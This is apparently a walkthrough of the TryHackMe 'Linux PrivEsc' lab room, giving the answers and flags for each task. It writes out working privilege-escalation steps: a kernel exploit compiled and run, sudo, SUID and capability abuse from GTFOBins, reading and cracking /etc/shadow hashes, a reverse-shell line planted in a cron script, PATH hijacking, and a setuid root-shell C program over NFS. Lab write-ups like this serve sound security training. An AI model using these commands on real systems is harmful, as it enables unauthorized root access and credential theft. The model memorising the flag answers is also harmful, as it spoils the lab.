Linux PrivEsc

This is my walkthrough for the TryHackMe Room: Linux PrivEsc.

This room can be found here. This room covers a few methods of escalating from a normal user to the root user on a system.

Task 3

This task has us launch a machine and access it via the browser OR ssh into the machine with the username karen and password Password1.

Enumeration is typically one of the first steps you take when gaining access to a system.

Question 1: What is the hostname of the target system?

wade7363 - We run hostname to find our answer.

Question 2: What is the Linux kernel version of the target system?

3.13.0-24-generic - We can run uname -a to find this info

Question 3: What Linux is this?

Ubuntu 14.04 LTS - We can run cat /etc/issue OR cat /etc/os-release to find this issue

Question 4: What version of the Python language is installed on the system?

2.7.6 - Running python -V will show this info

Question 5: What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

CVE-2015-1328 - If we search our kernel version, 3.13.0-24-generic, on ExploidDB we find this CVE.

Task 5

This task has us find a vulnerability (found from task 3) to exploit the machine with to gain access to the root account. We will obtain .c file exploit, get it to our victim machine, compile it, run it, and become root.

Question 1: What is the content of the flag1.txt file?

THM-28392872729920 - After downloading the .c file exploit from Task 3, we can get it onto our victim machine in whatever we can. A common way is via a Python Webserver.

Now we can wget the file to the /tmp/ directory on the victim

Now we need to compile the code. gcc pwn.c -o pwned and execute the new file ./pwned

We verify we have escalated our privilege and are the root user with whoami. We should see root.

To find the flag I ran find / -name flag*.txt.

We can now cat the file to receive our flag.

Task 6

Question 1: How many programs can the user "karen" run on the target system with sudo rights?

3 - we can run sudo -l to find this answer. She has access to find, less, and nano.

Question 2: What is the content of the flag2.txt file?

THM-402028394 - We cna look on GTFOBins and look for ways to use the commands Karen does have access to run with sudo rights. Looking up find we see:

So let's run sudo find . -exec /bin/sh ; -quit and see if we get root.

We do! So now we can find our flag.

Question 3: How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

sudo nmap --interactive - Searching for Nmap on GTFOBins will give us our answer.

Question 4: What is the hash of frank's password?

$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1 - The /etc/shadow file contains information about a Linux system's users, their passwords, and more. So if we cat that file, we can get franks password hash

Task 7

Question 1: Which user shares the name of a great comic book writer?

gerryconway - Like in Task 6, we can list users and password using /etc/shadow, except we don't have permission, there is another file we can view though. /etc/passwd.

Be sure to copy the contents of the /etc/passwd file to a .txt file

Question 2: What is the password of user2?

Password1 - The room lets us know we can run find / -type f -perm -04000 -ls 2>/dev/null to find SUID permissions. After looking through this list and comparing it to GTFOBins, I find one that they have in common, base64.

This basically says if we assign the variable of LFILE to to a file, then use base64 to encode, then decode that file, we can then read that file. Since we are after the password for the user, we want to the see the /etc/shadow file.

LFILE=/etc/shadow

base64 "$LFILE" | base64 --decode

Now we can use unshadow from the JohnTheRipper package to combine the files

Time to crack the passwords!

john --wordlist=(WORDLIST.TXT) (FILE.TXT)

Question 3: What is the content of the flag3.txt file?

THM-3847834 - Since we execute commands as root using the base64 SUID, we can find this with the same method.

Running find / -name flag3.txt reveals it is under /home/ubuntu/, so cd to that directory.

Task 8

This task focuses on Capabilities to gain root access. Root gives Karen access to use vim, but that is all. This shows us how that can be leveraged to become root.

Question 1: How many binaries have set capabilities?

6 - Running getcap -r / 2>/dev/null will give us our answer. If we ran this without the 2>/dev/null we would also see a lot of errors on screen.

Question 2: What other binary can be used through its capabilities?

View - Since we can see that Karen can use vim, we look through the GTFOBins to see that we can escalate our privileges. If we ls we see karen has a vim file in her directory, but it's owned by root, which means we can leverage this to gain root.

After testing the first 2 Shell options, I found the 3rd option worked ./vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'. Running THIS vim rather than the one inside of /usr/bin/ will get us our root shell.

Questionn 3:What is the content of the flag4.txt file?

THM-9349843 - After obtaining root, we can find the file location, cat it, obtaining our answer.

Task 9

In this task we figure out how leverage Cron Jobs, schedule tasks, to become root.

Question 1: How many user-defined cron jobs can you see on the target system?

4 - We can look at /etc/crontab to find this answer. This is available for nay user to look at.

Question 2: What is the content of the flag5.txt file?

THM-383000283 - If we ls we see we have a backup.sh file, which that is also in our crontab. We can look at the contents on the backup.sh file, also make a backup of it as well with cp backup.sh backup.sh.bak. Looking at the original with ls -l, we notice it is not executable, so let's fix that with chmod +x backup.sh. We can edit the .sh file and add in a reverse shell command.

bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1

In another terminal we can start our netcat listener

Now we wait for the crontab to run. After a minute or two, we should receive our root shell.

Question 3: What is Matt's password?

123456 - Running cat /etc/shadow | grep matt will give us his hash. Copy that to a .txt file and crack it.

Task 10

Question 1: What is the odd folder you have write access for?

/home/murdoch - Running find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u will show us our answer. So we have write access to murdochs home folder.

Question 2: What is the content of the flag6.txt file?

THM-736628929 - The hint from the question with no answer is "You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."

First we need to locate the file.

Now we echo $PATH

Now we add the folder we have write access to, to our path with export PATH=/home/murdoch:$PATH.

Now we create a file called thm with the contents of cat /home/matt/flag6.txt under /home/murdoch, then we change the permissions of the file with chmod 777 thm.

From here we can run ./test and obtain our flag.

Task 11

Question 1: How many mountable shares can you identify on the target system?

3 - Running showmount -e (IP) will give us our answer

Question 2: How many shares have the "no_root_squash" option enabled?

3 - Running cat /etc/exports will give us our answer. This checks the NFS configuration

Question 3: What is the content of the flag7.txt file?

THM-89384012 - We can now mount the NFS onto our machine mount -o rw (IP):(FOLDER) (FOLDER_ON_OUR_MACHINE)

The room gives us an executable we can run on the machine. I made a file nfs.c with the contents

int main()
{ setgid(0);
 setuid(0);
 system("/bin/bash");
 return 0;
}

Now we can compile it with gcc nfs.c -o nfs -w. Change the permissions of the file, chmod +s nfs

We can now execute the file on the target machine from the tmp directory, cd /tmp && ./nfs and obtain root. We can then obtain our flag with cat /home/matt/flag7.txt.